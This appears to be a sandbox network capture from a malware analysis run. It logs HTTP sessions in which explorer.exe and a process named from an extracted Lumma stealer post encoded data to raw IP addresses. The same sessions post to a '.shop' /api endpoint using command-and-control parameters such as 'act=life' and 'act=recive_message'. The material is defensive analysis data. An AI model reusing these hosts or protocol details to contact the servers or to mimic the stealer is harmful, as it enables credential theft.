                                                                                    Data Ascii: lsDpCTrimg72ZxsOebTZiP889Sm1uCJg5KbuD0LQV4aMtU4BQU7i8PlImAcXaoB183GOGpfpWlnqgLPPK9jJBUjOsM5FAXsGarZni46+Y/Or+lercBBFEpso6lWjYGmIy9WcFJ8qSgEqenvrN8g5uO5QNyajmjGv7uGFtvMhsQVc61Ww+QNfz5xnJGfgjZrDQHhq6EsBdMCw76SoNry0x7cCNLf9ymSLXEjHCENjqsbdvEpP26TWd5W1Gh+i0o7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.1049777167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:12 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:12 UTC1267OUTData Raw: 64 42 65 4f 56 4d 77 4c 34 46 52 65 76 67 34 56 44 6c 70 4f 59 45 62 32 4b 67 43 38 50 79 5a 51 59 68 4b 45 74 4b 70 6f 69 4d 2f 58 54 33 79 4c 2f 6e 31 69 34 6c 59 53 75 32 43 51 68 46 75 76 2f 65 4e 55 73 2f 51 54 46 66 4f 4c 47 6b 4d 61 35 71 32 31 54 42 47 6f 72 2f 35 50 56 50 37 4f 50 54 78 34 36 34 76 46 55 54 2f 35 70 4b 4a 59 48 7a 53 42 46 59 2f 50 63 52 42 44 54 38 34 52 4b 54 6c 52 68 67 61 49 2f 4b 6d 6d 31 35 52 4e 51 4f 38 56 6c 37 46 6a 63 44 35 33 74 79 68 6e 48 55 55 53 54 42 52 4e 30 62 48 4f 4f 48 6a 41 57 6c 42 54 45 6e 75 4f 4e 6f 4c 44 54 52 2b 48 38 53 61 6d 33 78 66 73 31 62 70 41 7a 61 54 68 49 6b 4c 44 77 71 6f 2f 56 37 6b 63 63 6d 65 4f 6f 4b 30 52 61 72 4d 35 53 38 76 37 32 56 54 64 75 38 6a 43 4a 69 4b 31 51 6b 41 54 42 47 6f
                                                                                    Data Ascii: dBeOVMwL4FRevg4VDlpOYEb2KgC8PyZQYhKEtKpoiM/XT3yL/n1i4lYSu2CQhFuv/eNUs/QTFfOLGkMa5q21TBGor/5PVP7OPTx464vFUT/5pKJYHzSBFY/PcRBDT84RKTlRhgaI/Kmm15RNQO8Vl7FjcD53tyhnHUUSTBRN0bHOOHjAWlBTEnuONoLDTR+H8Sam3xfs1bpAzaThIkLDwqo/V7kccmeOoK0RarM5S8v72VTdu8jCJiK1QkATBGo
                                                                                    2024-07-24 17:57:13 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:13 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:13 UTC685INData Raw: 45 59 76 6f 45 4a 7a 69 78 66 51 68 7a 6b 41 70 48 74 59 47 2b 30 43 6c 4e 4a 32 54 35 71 4b 48 6b 78 41 6b 72 2f 69 69 48 45 4f 58 43 42 77 4c 54 52 48 65 63 2b 46 75 7a 62 50 44 66 49 5a 69 30 6b 6a 45 63 56 55 6f 39 43 57 52 6e 35 4b 4d 4f 68 65 52 66 63 44 67 57 33 31 6c 62 77 32 6c 78 48 73 6b 41 41 77 42 78 64 32 41 79 4d 72 54 65 30 31 5a 63 67 72 77 30 49 2f 64 42 36 67 68 2f 42 34 69 6d 73 51 68 52 57 52 51 73 34 5a 45 6d 42 72 43 2b 6e 6e 59 47 7a 47 70 38 6e 61 61 77 43 4d 49 65 73 6b 39 69 67 37 36 2f 74 43 44 44 6b 41 52 76 2b 43 71 79 48 51 71 73 35 56 32 71 7a 78 61 42 66 64 34 69 4b 54 68 59 47 62 50 46 4d 42 36 54 2f 6a 62 43 4f 6a 4a 73 48 30 56 4b 49 66 2f 41 73 58 38 30 43 72 33 7a 6b 63 58 7a 50 48 6e 35 78 2f 6e 39 63 75 4c 61 30 6d
                                                                                    Data Ascii: EYvoEJzixfQhzkApHtYG+0ClNJ2T5qKHkxAkr/iiHEOXCBwLTRHec+FuzbPDfIZi0kjEcVUo9CWRn5KMOheRfcDgW31lbw2lxHskAAwBxd2AyMrTe01Zcgrw0I/dB6gh/B4imsQhRWRQs4ZEmBrC+nnYGzGp8naawCMIesk9ig76/tCDDkARv+CqyHQqs5V2qzxaBfd4iKThYGbPFMB6T/jbCOjJsH0VKIf/AsX80Cr3zkcXzPHn5x/n9cuLa0m


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.1049778107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:14 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:14 UTC1267OUTData Raw: 66 4a 77 4c 6b 72 49 6a 67 47 6b 52 66 65 53 64 2b 6b 64 44 45 51 59 62 6a 61 39 69 73 57 69 2f 70 58 76 73 6e 79 76 66 4e 4c 36 6c 64 47 33 76 71 72 6c 33 6d 6b 69 5a 30 79 62 47 63 6c 58 32 53 56 39 39 42 47 75 46 68 53 6b 74 51 44 6b 51 78 6a 37 71 4a 61 35 69 4a 36 63 57 72 59 79 42 6a 61 44 35 57 61 52 70 50 69 4c 66 2f 6b 56 47 76 58 6d 31 73 50 35 39 72 2b 67 45 6c 44 2f 46 50 6f 56 55 61 5a 7a 31 38 64 33 62 4d 4f 7a 54 4b 62 78 45 41 73 75 78 4e 41 57 2f 4e 33 4c 61 79 4b 68 4d 57 64 45 55 6f 43 73 6c 53 50 52 50 6c 4f 43 42 6c 61 5a 61 4f 49 4a 52 37 33 32 35 4d 37 49 6c 54 5a 74 59 33 67 53 52 75 61 39 59 77 59 6d 34 38 62 69 68 2b 47 6f 48 57 44 66 6f 77 55 66 6c 35 6a 62 61 33 4f 4f 46 34 48 74 6b 79 65 50 67 65 61 6c 49 54 52 39 66 5a 74 6f
                                                                                    Data Ascii: fJwLkrIjgGkRfeSd+kdDEQYbja9isWi/pXvsnyvfNL6ldG3vqrl3mkiZ0ybGclX2SV99BGuFhSktQDkQxj7qJa5iJ6cWrYyBjaD5WaRpPiLf/kVGvXm1sP59r+gElD/FPoVUaZz18d3bMOzTKbxEAsuxNAW/N3LayKhMWdEUoCslSPRPlOCBlaZaOIJR7325M7IlTZtY3gSRua9YwYm48bih+GoHWDfowUfl5jba3OOF4HtkyePgealITR9fZto
                                                                                    2024-07-24 17:57:15 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:15 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:15 UTC685INData Raw: 65 55 65 50 59 31 31 76 59 69 4d 52 51 78 2b 4f 48 74 4e 79 34 31 50 50 52 49 2f 2b 33 31 54 79 50 74 67 58 49 56 6e 50 39 6c 41 4a 39 4f 64 32 58 48 44 39 77 70 51 47 50 74 32 34 65 30 64 6d 76 30 58 6f 4f 4e 4f 35 4c 37 46 49 34 39 6b 6c 71 38 31 31 4e 34 35 64 77 38 52 76 6d 74 73 52 43 41 2f 73 4a 6c 51 2f 2f 6a 6a 36 4d 6f 49 38 71 7a 74 41 63 44 32 30 65 45 77 6a 56 6b 33 33 6b 4d 4f 2f 63 34 63 52 53 65 4c 6d 6d 6d 4d 63 35 73 35 73 41 66 4c 78 30 57 6d 35 39 70 57 4d 38 6b 4a 30 39 49 6c 50 6a 66 32 30 7a 72 66 50 6b 64 69 74 35 6f 62 72 72 4c 4e 63 66 61 46 6d 4d 68 46 6b 78 43 67 54 6e 57 6b 6c 6d 41 38 67 4e 61 4d 59 6e 62 78 4d 6d 5a 61 75 51 58 51 4b 78 70 76 39 76 4c 6e 71 31 74 6f 30 55 67 53 2f 41 6f 2b 57 4b 62 52 64 76 54 51 7a 39 44 76
                                                                                    Data Ascii: eUePY11vYiMRQx+OHtNy41PPRI/+31TyPtgXIVnP9lAJ9Od2XHD9wpQGPt24e0dmv0XoONO5L7FI49klq811N45dw8RvmtsRCA/sJlQ//jj6MoI8qztAcD20eEwjVk33kMO/c4cRSeLmmmMc5s5sAfLx0Wm59pWM8kJ09IlPjf20zrfPkdit5obrrLNcfaFmMhFkxCgTnWklmA8gNaMYnbxMmZauQXQKxpv9vLnq1to0UgS/Ao+WKbRdvTQz9Dv


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.1049779107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:16 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:16 UTC1267OUTData Raw: 58 72 2b 57 2b 6f 6f 52 33 53 37 43 2f 39 66 36 49 35 43 79 76 49 62 41 6e 70 70 54 58 78 57 43 47 51 72 47 6f 42 50 76 33 38 69 4a 67 53 42 34 6f 34 42 6a 4a 73 41 38 2b 59 63 61 57 4f 48 76 4d 76 51 4a 4c 59 6f 68 47 7a 66 6c 2b 33 44 4c 46 49 47 34 77 48 74 54 30 71 39 6b 50 69 62 54 2f 54 66 76 4b 69 4d 48 34 6a 70 31 53 4a 32 64 4f 71 4e 31 37 4b 53 78 46 6a 67 56 6d 37 71 39 4a 72 64 48 7a 2f 4b 54 4f 6a 61 52 57 74 50 57 47 43 6c 79 56 78 71 4e 35 55 65 6d 6d 6e 30 54 61 56 30 33 71 39 51 4a 57 33 75 6f 37 48 7a 4a 58 78 6b 32 71 47 50 67 54 73 78 4b 64 31 6a 6b 54 5a 65 42 34 57 37 6b 39 35 6c 4e 5a 5a 55 31 33 4c 31 43 36 53 4b 4a 32 61 65 46 50 73 78 62 6e 78 79 44 79 73 68 2f 71 33 2f 68 35 42 62 50 66 45 2b 4f 76 70 73 37 67 47 7a 6a 68 50 57
                                                                                    Data Ascii: Xr+W+ooR3S7C/9f6I5CyvIbAnppTXxWCGQrGoBPv38iJgSB4o4BjJsA8+YcaWOHvMvQJLYohGzfl+3DLFIG4wHtT0q9kPibT/TfvKiMH4jp1SJ2dOqN17KSxFjgVm7q9JrdHz/KTOjaRWtPWGClyVxqN5Uemmn0TaV03q9QJW3uo7HzJXxk2qGPgTsxKd1jkTZeB4W7k95lNZZU13L1C6SKJ2aeFPsxbnxyDysh/q3/h5BbPfE+Ovps7gGzjhPW
                                                                                    2024-07-24 17:57:17 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:17 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:17 UTC685INData Raw: 44 66 72 67 47 38 57 54 50 58 48 36 35 42 2f 48 6c 72 62 33 68 4c 41 63 33 33 32 6d 4f 45 50 55 76 49 51 66 42 74 4a 6c 57 38 46 4c 33 74 50 37 6c 48 4e 4a 30 4b 61 35 58 6b 75 67 58 65 62 54 4b 4b 49 50 69 45 61 7a 49 39 69 4c 6b 39 46 67 4d 30 4d 49 66 42 71 59 71 6e 75 46 4d 79 56 30 6b 30 44 68 74 63 39 68 38 4e 62 32 58 72 74 42 6f 4c 6a 59 63 52 32 58 6a 57 6e 63 74 73 42 2f 4c 58 5a 70 31 6d 6d 35 71 36 2b 30 44 41 78 43 50 74 44 57 43 6e 6a 69 41 36 43 48 4d 69 79 42 47 79 51 66 4d 34 6d 70 45 77 5a 39 5a 4e 59 4b 46 4b 6e 67 35 2b 5a 45 6a 4d 2b 42 42 75 79 46 71 45 62 35 49 6e 75 4e 50 59 56 57 4a 6b 6d 44 50 49 79 4c 68 75 74 5a 42 76 5a 4b 62 30 58 37 4b 33 5a 77 48 6b 61 53 45 42 57 76 59 42 50 53 59 75 5a 54 35 43 57 36 45 67 58 57 47 73 76
                                                                                    Data Ascii: DfrgG8WTPXH65B/Hlrb3hLAc332mOEPUvIQfBtJlW8FL3tP7lHNJ0Ka5XkugXebTKKIPiEazI9iLk9FgM0MIfBqYqnuFMyV0k0Dhtc9h8Nb2XrtBoLjYcR2XjWnctsB/LXZp1mm5q6+0DAxCPtDWCnjiA6CHMiyBGyQfM4mpEwZ9ZNYKFKng5+ZEjM+BBuyFqEb5InuNPYVWJkmDPIyLhutZBvZKb0X7K3ZwHkaSEBWvYBPSYuZT5CW6EgXWGsv


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.1049780172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:17 UTC268OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-07-24 17:57:18 UTC816INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=sohckf4sam1gtgbd3o7ld0kb7m; expires=Sun, 17-Nov-2024 11:43:57 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ai4zXPDYqam%2FvIQ9KE%2BYOyC72F0Pxbz7Y16AniBb%2ByyZRyV%2BZ6XGNc6CqCcFgc2slcbOZs2NXDF%2BuBKxeOAvtvsKlGeoVqWAYNx10nVkC3iEfADEyHW%2FRMLT6J52CK%2FbOlEC%2B9R3nLY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cab31df70f9d-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-07-24 17:57:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.1049781167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:18 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:18 UTC1267OUTData Raw: 70 4b 35 6e 4d 49 5a 58 6b 6a 2f 41 58 4f 56 57 79 58 37 37 51 36 55 44 57 35 6d 45 6c 34 48 50 58 57 4d 65 57 4f 43 51 63 69 30 4b 2b 63 78 66 6a 74 4c 66 31 75 4d 58 61 68 2f 35 53 76 4c 35 4e 77 4b 2b 52 42 59 71 51 78 72 4c 50 63 64 49 6a 69 65 4a 77 74 71 50 4a 78 2b 74 69 33 55 56 59 4e 45 4b 31 35 36 51 39 30 76 7a 32 4c 54 38 77 6c 6e 4b 36 4c 5a 39 75 61 64 4e 72 4f 6a 4f 34 77 57 76 4e 38 56 42 37 46 52 6f 56 4b 38 6b 6c 4c 42 74 70 38 31 4f 42 7a 63 73 4d 4b 7a 55 4f 76 51 46 2b 62 59 33 65 49 77 50 35 36 72 43 41 62 53 59 45 64 52 66 67 63 55 36 39 63 4a 73 53 6a 56 41 70 75 76 56 69 67 6f 67 6e 58 78 77 71 50 53 6f 34 49 37 35 31 47 53 4b 6e 34 53 6d 35 4e 48 6a 42 52 37 7a 37 68 51 6a 34 51 58 73 44 70 45 42 65 30 6b 72 32 77 49 41 72 55 72
                                                                                    Data Ascii: pK5nMIZXkj/AXOVWyX77Q6UDW5mEl4HPXWMeWOCQci0K+cxfjtLf1uMXah/5SvL5NwK+RBYqQxrLPcdIjieJwtqPJx+ti3UVYNEK156Q90vz2LT8wlnK6LZ9uadNrOjO4wWvN8VB7FRoVK8klLBtp81OBzcsMKzUOvQF+bY3eIwP56rCAbSYEdRfgcU69cJsSjVApuvVigognXxwqPSo4I751GSKn4Sm5NHjBR7z7hQj4QXsDpEBe0kr2wIArUr
                                                                                    2024-07-24 17:57:19 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:19 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:19 UTC685INData Raw: 6b 75 72 35 55 6f 79 52 5a 6e 2b 69 6a 53 53 47 55 4a 68 4e 32 4e 77 65 5a 67 43 33 33 59 6f 72 79 6a 56 2f 5a 4c 38 53 37 67 68 4b 6a 56 4b 73 4b 44 42 43 78 37 67 4a 4b 6a 58 64 61 36 56 54 69 68 45 4d 38 56 78 65 66 48 5a 6e 33 51 77 76 42 67 51 48 33 37 72 74 6c 4f 77 35 4c 41 6a 63 71 6d 36 70 44 33 47 77 68 30 47 67 63 58 46 38 52 6a 2f 2f 54 79 55 2f 73 61 41 6f 61 4b 74 33 61 2b 37 64 4b 57 4c 47 6c 48 42 63 48 53 56 68 4b 73 65 50 79 4a 4d 51 4e 56 45 50 44 31 73 41 50 61 42 2f 37 39 4c 2f 4a 39 79 45 41 48 42 41 32 43 71 54 33 4e 34 42 55 68 47 55 59 6b 4f 54 44 4d 69 65 44 69 51 6a 54 33 69 2f 32 67 69 6c 71 4d 63 38 33 62 44 49 47 48 77 59 39 2f 6e 47 64 2b 6d 65 46 56 31 76 6e 2b 67 31 57 58 6f 74 75 78 49 6d 4a 35 6e 4c 2f 42 78 46 68 71 33
                                                                                    Data Ascii: kur5UoyRZn+ijSSGUJhN2NweZgC33YoryjV/ZL8S7ghKjVKsKDBCx7gJKjXda6VTihEM8VxefHZn3QwvBgQH37rtlOw5LAjcqm6pD3Gwh0GgcXF8Rj//TyU/saAoaKt3a+7dKWLGlHBcHSVhKsePyJMQNVEPD1sAPaB/79L/J9yEAHBA2CqT3N4BUhGUYkOTDMieDiQjT3i/2gilqMc83bDIGHwY9/nGd+meFV1vn+g1WXotuxImJ5nL/BxFhq3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.1049782172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:18 UTC269OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 42
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:18 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=qToYrJ--&j=
                                                                                    2024-07-24 17:57:19 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=vuc3pcnjr9ghn1p8et9ino0sa6; expires=Sun, 17-Nov-2024 11:43:58 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tv9AZBiY6dLn6%2FUEKu8g7B4dWfpntN1951EzLV0eWgvBRqPMznKUlDm7KYWCBGnQ%2BAKj8XDGOVT2tEwpdABV2LcVABSZ4ONMomr2q78BIiACqNnzM1POnx1ZvUKEEsGOq%2FRc%2FXpDxN8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cab98ecec481-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:19 UTC561INData Raw: 31 64 39 61 0d 0a 4d 77 35 55 5a 68 70 36 34 43 61 36 78 72 69 50 58 4b 52 66 72 36 56 67 2b 71 39 34 36 56 67 64 76 58 4b 42 4a 35 4a 71 50 53 74 49 4c 43 4a 45 49 45 37 4d 42 4d 6d 6a 6d 72 55 6f 31 69 72 4b 69 55 4b 62 79 31 72 54 50 6e 7a 52 41 65 51 4c 73 42 78 51 43 51 6c 6f 4e 51 70 70 48 38 77 45 33 37 36 61 74 51 66 66 66 63 72 4c 51 73 43 4e 48 59 4d 36 66 4e 45 51 34 45 7a 39 47 6c 46 49 57 32 49 7a 44 6e 38 5a 68 45 66 57 71 39 33 71 4f 63 55 31 77 63 77 4e 6b 73 4a 61 78 58 70 34 78 31 43 37 42 64 38 50 53 55 70 2b 62 79 63 4e 4f 41 66 4d 58 5a 69 6a 31 71 31 6d 68 6a 37 4b 78 77 79 63 79 78 4f 42 4d 48 58 5a 45 65 56 4e 34 67 4e 62 51 31 74 73 4d 41 39 31 45 4a 42 4b 33 4b 7a 57 37 44 50 46 66 59 4f 48 42 59 43 4e 51 73 74 70 54 64 77 42 38
                                                                                    Data Ascii: 1d9aMw5UZhp64Ca6xriPXKRfr6Vg+q946VgdvXKBJ5JqPStILCJEIE7MBMmjmrUo1irKiUKby1rTPnzRAeQLsBxQCQloNQppH8wE376atQfffcrLQsCNHYM6fNEQ4Ez9GlFIW2IzDn8ZhEfWq93qOcU1wcwNksJaxXp4x1C7Bd8PSUp+bycNOAfMXZij1q1mhj7KxwycyxOBMHXZEeVN4gNbQ1tsMA91EJBK3KzW7DPFfYOHBYCNQstpTdwB8
                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 44 4c 67 4d 48 64 68 61 46 55 70 69 37 6c 50 52 2b 77 54 47 4e 6e 30 4b 57 79 42 57 5a 4f 32 33 61 48 76 46 4a 39 51 35 53 53 6c 39 73 4d 77 4e 31 46 6f 52 44 32 36 7a 65 37 44 44 4b 4e 38 37 44 41 64 69 44 57 6f 77 69 50 34 64 51 30 6b 62 30 44 30 31 4b 58 79 77 70 53 6d 46 59 68 55 69 59 2f 4a 72 6e 4f 4d 73 30 78 73 41 4b 6c 4e 38 52 68 44 6c 32 32 42 62 70 52 76 67 43 57 55 64 51 61 7a 4d 44 61 68 61 4a 53 64 75 75 33 4b 31 77 68 6a 72 56 68 31 72 59 34 78 6d 61 4c 45 33 63 41 66 49 46 37 30 5a 47 43 56 5a 67 64 6c 77 34 45 59 70 4c 31 61 6e 51 34 7a 76 4c 4e 4d 7a 47 44 35 37 47 47 34 4d 79 65 39 67 51 35 30 6a 2f 42 6c 39 48 57 57 6b 79 44 6e 46 59 7a 41 54 66 76 4a 71 31 66 76 59 77 77 63 77 4f 32 76 67 5a 68 54 52 34 79 56 44 38 43 2b 6c 49 57 45
                                                                                    Data Ascii: DLgMHdhaFUpi7lPR+wTGNn0KWyBWZO23aHvFJ9Q5SSl9sMwN1FoRD26ze7DDKN87DAdiDWowiP4dQ0kb0D01KXywpSmFYhUiY/JrnOMs0xsAKlN8RhDl22BbpRvgCWUdQazMDahaJSduu3K1whjrVh1rY4xmaLE3cAfIF70ZGCVZgdlw4EYpL1anQ4zvLNMzGD57GG4Mye9gQ50j/Bl9HWWkyDnFYzATfvJq1fvYwwcwO2vgZhTR4yVD8C+lIWE
                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 43 58 4d 53 6a 30 44 66 70 5a 71 6a 66 73 45 6c 6a 5a 39 43 72 74 30 58 68 78 52 30 30 78 6d 6a 57 72 34 52 48 30 35 64 4c 47 35 45 66 42 53 4b 54 74 65 74 30 4f 63 78 7a 7a 33 46 7a 67 75 62 7a 52 61 4e 4f 33 50 54 48 65 5a 47 39 51 56 61 53 56 31 72 4d 51 55 34 56 73 4a 44 77 4f 53 43 72 51 37 4c 4d 63 62 4c 51 4b 33 4f 46 49 55 39 61 5a 38 50 72 56 79 77 44 31 4d 4a 43 53 77 35 42 58 55 53 69 55 72 55 70 64 72 70 50 63 77 39 77 73 49 45 6b 4d 51 61 6d 54 31 77 33 68 48 6f 54 76 30 47 57 6b 68 55 61 33 5a 4b 4f 42 2b 61 42 49 44 6b 39 38 51 45 68 69 4b 44 33 6b 4b 66 77 56 72 54 65 6e 76 56 45 4f 35 50 2b 77 64 63 54 6c 39 73 4f 77 35 71 45 49 4a 45 31 71 4c 62 34 54 76 48 4d 63 37 56 44 70 37 41 48 49 4d 6f 50 35 46 51 35 46 32 77 55 42 39 70 57 6d 41
                                                                                    Data Ascii: CXMSj0DfpZqjfsEljZ9Crt0XhxR00xmjWr4RH05dLG5EfBSKTtet0Ocxzz3FzgubzRaNO3PTHeZG9QVaSV1rMQU4VsJDwOSCrQ7LMcbLQK3OFIU9aZ8PrVywD1MJCSw5BXUSiUrUpdrpPcw9wsIEkMQamT1w3hHoTv0GWkhUa3ZKOB+aBIDk98QEhiKD3kKfwVrTenvVEO5P+wdcTl9sOw5qEIJE1qLb4TvHMc7VDp7AHIMoP5FQ5F2wUB9pWmA
                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 49 68 4e 30 4b 4c 56 35 43 7a 46 4d 63 50 41 44 4a 54 44 46 34 45 35 63 70 39 65 6f 30 4c 6f 53 41 63 4a 66 57 73 37 4b 6e 4d 55 68 51 54 48 36 73 4f 74 4f 63 70 39 6c 59 63 4f 6b 73 45 54 69 7a 4e 36 31 78 76 71 51 50 45 44 57 6b 70 58 59 54 6b 4e 61 68 4b 42 53 74 75 6f 31 75 73 2f 78 53 2f 46 7a 6b 4c 57 6a 52 32 54 65 69 65 66 4d 65 31 49 35 41 39 50 43 55 34 69 4c 30 52 2f 46 4d 49 63 6d 4b 66 62 34 6a 33 48 4d 4d 76 4f 43 70 6a 4c 48 34 51 33 63 64 67 58 34 30 6a 2b 42 31 6c 42 58 47 41 39 43 6e 45 65 67 6b 58 53 35 4a 53 74 4f 64 35 39 6c 59 63 79 6d 38 30 61 6b 48 70 67 6b 51 6d 6a 51 76 78 49 42 77 6c 44 5a 6a 38 45 65 78 65 46 51 4e 4f 6f 33 2b 67 78 78 54 54 49 7a 67 79 4b 78 42 53 44 4d 6e 44 61 47 2b 4e 49 2b 67 52 66 53 68 45 69 64 67 4e 67
                                                                                    Data Ascii: IhN0KLV5CzFMcPADJTDF4E5cp9eo0LoSAcJfWs7KnMUhQTH6sOtOcp9lYcOksETizN61xvqQPEDWkpXYTkNahKBStuo1us/xS/FzkLWjR2TeiefMe1I5A9PCU4iL0R/FMIcmKfb4j3HMMvOCpjLH4Q3cdgX40j+B1lBXGA9CnEegkXS5JStOd59lYcym80akHpgkQmjQvxIBwlDZj8EexeFQNOo3+gxxTTIzgyKxBSDMnDaG+NI+gRfShEidgNg
